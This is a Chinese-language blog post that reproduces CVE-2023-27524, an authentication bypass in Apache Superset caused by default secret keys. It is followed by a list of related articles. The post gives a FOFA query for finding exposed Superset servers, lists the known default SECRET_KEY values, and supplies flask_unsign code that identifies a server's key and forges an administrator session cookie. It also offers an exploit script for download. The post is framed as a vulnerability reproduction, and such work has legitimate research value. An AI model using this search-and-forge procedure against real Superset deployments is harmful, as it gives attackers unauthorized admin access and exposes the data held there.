superset未授权访问漏洞(CVE-2023-27524)复现

已于 2024-01-12 15:20:58 修改
阅读量1.7k 收藏 10
点赞数 13
分类专栏: 漏洞复现 文章标签: 安全漏洞 漏洞复现 superset
于 2024-01-12 11:00:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiayu729100940/article/details/135533031
版权

Superset是一个开源的数据探索和可视化平台。它由Apache软件基金会支持,旨在帮助用户通过直观的方式探索、分析和可视化复杂的数据集。Superset支持多种数据源,包括关系型数据库、NoSQL数据库和各种其他数据存储系统。Apache Superset 2.0.1 版本及之前版本存在安全漏洞。攻击者利用该漏洞验证和访问未经授权的资源。

1.漏洞级别

高危

2.漏洞搜索

fofa

title="Superset"

3.影响范围

Apache Superset 2.0.1 版本及之前版本

4.漏洞复现

4.1 版本检测

访问url/login/,点击右上角设置按钮,下拉即可查看版本。
在这里插入图片描述低于2.0.1版本的服务都在漏洞覆盖范围。

4.2 获取有效cookie

由于漏洞的生成原因是由于使用了默认的加密key,所以我们需要先测试目标网站使用的是哪一个默认key,通常这个是由版本决定的。

#现有的默认key
SECRET_KEYS = [
    b'\x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h',  # version < 1.4.1
    b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET',          # version >= 1.4.1
    b'thisISaSECRET_1234',                            # deployment template
    b'YOUR_OWN_RANDOM_GENERATED_SECRET_KEY',          # documentation
    b'TEST_NON_DEV_SECRET'                            # docker compose
]

superset是python项目,使用的是flask的加密模块,因此我们可以通过对默认key的逐个解密来测试网站使用了那个key。
抓包获取一个随机cookie:
在这里插入图片描述
我们可以使用flask模块进行解密测试:

from flask_unsign import session
SECRET_KEYS = [
    b'\x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h',  # version < 1.4.1
    b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET',          # version >= 1.4.1
    b'thisISaSECRET_1234',                            # deployment template
    b'YOUR_OWN_RANDOM_GENERATED_SECRET_KEY',          # documentation
    b'TEST_NON_DEV_SECRET'                            # docker compose
]
session.decode(cookie)
for key in SECRET_KEYS:
	cracked = session.verify(cookie, key)
	if cracked:
		break
if not cracked:
	print("无法解密cookie")
	return None
print("使用的解密key:"+key.decode())

其中cookie就是我们上文通过抓包获取的页面返回cookie,解密成功的话就会返回正确的key,接下来我们就可以用这个key生成一个新的cookie。

forged_cookie = session.sign({'_user_id': 1, 'user_id': 1}, key)
print("可用的登录cookie:"+forged_cookie)

这里我们默认生成一个userid=1,即管理员账户的cookie,你也可以修改userid的值来生成指定的用户cookie.
在这里插入图片描述
获取到cookie后,可以在浏览器中替换cookie,然后刷新页面,即可成功登录后台。
在这里插入图片描述

4.3脚本利用

使用脚本放附件上,有需要可以自行下载。
执行

python3 -u url

输出内容如下:
在这里插入图片描述

复现到这里就结束了,欢迎随时交流~

在这里插入图片描述

漏洞复现】Apache Superset 未授权访问漏洞(CVE-2023-27524)
李火火的安全圈
05-04 2522
Apache Superset 是美国阿帕奇(Apache)基金会的一个数据可视化和数据探索平台。Apache Superset 2.0.1 版本及之前版本存在安全漏洞,攻击者可利用该漏洞验证和访问未经授权的资源。
CVE-2023-27524:Apache Superset未授权访问漏洞复现
薛定谔嘚喵博客
11-23 1610
由于Apache Superset存在不安全的默认配置,未根据安装说明更改默认SECRET_KEY的系统受此漏洞影响,未经身份认证的远程攻击者利用此漏洞可以访问未经授权的资源或执行恶意代码。
Apache Superset 未授权访问漏洞(CVE-2023-27524)
holyxp的博客
06-30 785
Apache Superset 是美国阿帕奇(Apache)基金会的一个数据可视化和数据探索平台。
Apache Superset 会话验证漏洞可导致攻击者访问未授权资源
smellycat000的专栏
04-26 1196
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士今年年初早些时候,Apache Superset 中设置了不安全的默认配置,攻击者可借此登录并接管该数据可视化应用、窃取数据并执行恶意代码。该漏洞编号是CVE-2023-27524。Apache Superset 基于 Python 的Flash 框架,默认配置公开已知的密钥 SECRET_KEY = '\2\1thisismyscretkey\...
Apache Superset中存在严重漏洞
smellycat000的专栏
01-17 1446
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士开源数据可视化和数据探索平台Apache Superset 发布七份安全公告。Apache Superset 是一款现代数据探索和数据可视化平台,能够为很多团队替代或扩充专有的业务情报工具,能够很好地集成多种数据来源。Apache Superset 的SQL Alchemy 连接器中存在一个严重的SQL注入漏洞 (CVE-2022-41703),...
CVE-2020-13948 —— Apache Superset 远程代码执行漏洞
战神/calmness的博客
12-10 717
目录 Apache Superset组件介绍 描述 影响版本 过程 修复建议 CVE-2020-13948 | Apache Superset 远程代码执行漏洞 Apache Superset组件介绍 Apache Superset 是Airbnb公司开源的数据分析与可视化平台(曾用名Caravel、Panoramix),该工具主要特点是可自助分析、自定义仪表盘、分析结果可视化(导出)、用户/角色权限控制,还集成了SQL编辑器,可以进行SQL编辑查询等操作。 描述 9月15日Apac
Apache Superset 存在未授权访问漏洞(CVE-2023-27524)详细利用过程
nnn2188185的博客
05-03 2566
Apache Superset 是美国阿帕奇(Apache)基金会的一个数据可视化和数据探索平台。Apache Superset 2.0.1 版本及之前版本存在安全漏洞。攻击者利用该漏洞验证和访问未经授权的资源。
Apache Superset 未授权访问漏洞(含批量验证poc)
weixin_43567873的博客
04-03 104
Apache Superset 未授权访问漏洞(含批量验证poc)
OSCS开源安全周报第 59 期:Apache Superset<2.1.1 远程代码执行漏洞(CVE-2023-37941)
OSCS开源安全社区
09-11 662
OSCS 社区共收录安全漏洞个,公开漏洞值得关注的是远程代码执行漏洞( CVE-2023-37941 )、命令可绕过配置( CVE-2023-41053 )、集群密钥泄漏风险( CVE-2023-40029 )、注入漏洞( CVE-2023-39358 )。针对仓库,共监测到个不同版本的投毒组件,值得关注的是等投毒组件包窃取系统敏感信息(
实战-ApacheSuperset未授权访问漏洞(CVE-2023-27524)
Welcome To Myon'Blog !
01-19 1996
Apache Superset 是一个开源的现代数据探索和可视化平台Apache Superset 是一种广泛使用的数据可视化和探索开源工具,已被确定存在潜在的安全漏洞,可能导致身份验证绕过和远程代码执行 (RCE),这些漏洞可能使恶意行为者能够获得目标服务器上的管理权限,从而使他们能够收集用户凭据并可能危及数据。安装官方发布的升级修复补丁。
Apache Superset 身份认证绕过漏洞CVE-2023-27524
蚁景网安学院
06-20 959
Apache Superset是一个开源的数据可视化和数据探测平台,它基于Python构建,使用了一些类似于Django和Flask的Python web框架。提供了一个用户友好的界面,可以轻松地创建和共享仪表板、查询和可视化数据,也可以集成到其他应用程序中。
Apache Superset 漏洞导致服务器易遭RCE攻击
smellycat000的专栏
09-08 395
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士Apache Superset 修复了两个漏洞,本可导致攻击者在受影响系统上获得远程代码执行权限。Apache Superset 更新版本 2.1.1 修复了两个漏洞CVE-2023-39265和CVE-2023-37941。一旦恶意人员获得对 Superset 元数据数据库的控制权限,就能够利用这两个漏洞执行恶意操作。除了这两个漏洞外,Supe...
【高危】Apache Superset <2.1.0 认证绕过漏洞(POC)(CVE-2023-27524
murphysec的博客
04-28 946
Apache Superset 是一个开源的数据可视化和业务智能平台,可用于数据探索分析和数据可视化。 Apache Superset 受影响版本在使用默认的secret_key时,攻击者可通过默认的secret_key为任意用户生成有效的会话令牌,进而绕过验证造成信息泄露,甚至造成任意代码执行。
Apache Superset 安全漏洞 CVE-2023-27524 教程
gitblog_00909的博客
08-25 717
Apache Superset 安全漏洞 CVE-2023-27524 教程 CVE-2023-27524Basic PoC for CVE-2023-27524: Insecure Default Configuration in Apache Superset项目地址:https://gitcode.com/gh_mirrors/cv/CVE-2023-27524 项目介绍 Apache S...
CVE-2023-27524 Apache Superset Auth Bypass|附检测工具
dust_hk的博客
05-08 1114
简单来说session就是浏览器与服务器交互的门禁,通过session可以验证访问者的身份信息,大多数的session是保存在服务器端的,但是也有少部分保存在客户端的session,比如下面要说的flask框架。Apache Superset是基于python中的flask web框架编写的,flask是一个python轻量级web框架,它的session存储在客户端的cookie字段中。注:文章所涉及的技术内容仅供参考,利用本文所提供的信息造成的直接或间接后果和损失,均由使用者自行承担。
CVE-2023-27524 Apache Superset 身份认证绕过漏洞
YJ_12340的博客
06-19 804
Apache Superset是一个开源的数据可视化和数据探测平台,它基于Python构建,使用了一些类似于Django和Flask的Python web框架。提供了一个用户友好的界面,可以轻松地创建和共享仪表板、查询和可视化数据,也可以集成到其他应用程序中。由于用户在默认安装过程中,未对SECRET_KEY的默认值进行更改,未经身份验证的攻击者通过伪造管理员身份进行访问后台,并通过后台原本数据库执行功能实现命令执行操作。‍。
CVE-2020-13948: Apache Superset远程代码执行漏洞
爱国小白帽
09-20 2166
360CERT [三六零CERT](javascript:void(0)???? 昨天 报告编号:B6-2020-091901 报告来源:360CERT 报告作者:360CERT 更新日期:2020-09-19 0x01 漏洞简述 2020年09月19日,360CERT监测发现 Apache 邮件组 发布了 superset 代码执行漏洞 的风险通告,该漏洞编号为 CVE-2020-13948 ,漏洞等级:高危,漏洞评分:7.2。 经过身份验证的远程攻击者通过发送特制的请求包,可以造成 远程代码执行 影响
Superset二次开发之更新 SECRET_KEY
Aimmon
05-31 1155
SECRET_KEY是Superset配置文件中的一个关键项,用于保障应用的安全性。生成一个强随机性的SECRET_KEY并在中配置,可以防止数据篡改和安全攻击。更新SECRET_KEY时需要注意会话失效问题,并且在更新后重启Superset服务以使新密钥生效。
superset:常用小技巧
不花的花和尚的博客
05-16 7840
透视表: 指标:就是你要查询出的字段 groupby 分组 表头默认显示字段名,如何将字段名改为中文? 饼图(环形图): 因为要展示的是占比,所以只需要返回一个字段即可,也就是count的总和,这里当然不group by 也可,order by是排序。 group by 哪个字段就是求这个字段所有类型的百分比,如“国家”占全球面积占比 折线图: ...
如何对Apache Superset进行安全配置以防止远程代码执行漏洞CVE-2023-27524?请提供详细的步骤和建议。
最新发布
10-26
参考资源链接:[Apache Superset安全漏洞:RCE攻击实践与防范](https://wenku.csdn.net/doc/6o9dy2gmj4?utm_source=wenku_answer2doc_content) 在处理Apache Superset的安全配置时,了解如何防御CVE-2023-27524漏洞至关重要。本文档《Apache Superset安全漏洞:RCE攻击实践与防范》将为你提供详细的安全配置建议和步骤,帮助你有效防范远程代码执行漏洞。 首先,更新到Apache Superset的最新版本至关重要,尤其是1.4.1版本之后的更新,以确保所有已知的安全漏洞得到修复。接下来,需要根据官方文档的建议,更改默认的SECRET_KEY值。SECRET_KEY是Apache Superset用来签名会话令牌的一个安全密钥,更改默认值可以增加系统的安全性。你可以通过修改配置文件或设置环境变量来实现这一点。 其次,启用SSL/TLS对于保护数据传输过程中的安全同样重要。通过使用SSL/TLS,可以确保所有通过网络传输的数据都是加密的,这大大增加了数据被窃听和篡改的难度。 此外,实施严格的访问控制也是必要的。你应该根据最小权限原则,为用户分配适当的权限,限制不必要的数据库操作权限。例如,只有授权的用户或角色才能执行特定的SQL语句。 最后,建议定期进行安全审核和漏洞扫描,以确保配置的正确性和系统的安全性。通过这些步骤,你可以显著提高Apache Superset的抗攻击能力,并降低被CVE-2023-27524这样的漏洞攻击的风险。 为了更深入地理解和掌握Apache Superset的安全配置,你可以阅读《Apache Superset安全漏洞:RCE攻击实践与防范》。本文档不仅介绍了如何识别和防范CVE-2023-27524漏洞,还提供了丰富的安全策略和最佳实践,帮助你在使用开源工具时能够更好地进行漏洞管理和数据可视化。 参考资源链接:[Apache Superset安全漏洞:RCE攻击实践与防范](https://wenku.csdn.net/doc/6o9dy2gmj4?utm_source=wenku_answer2doc_content)
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值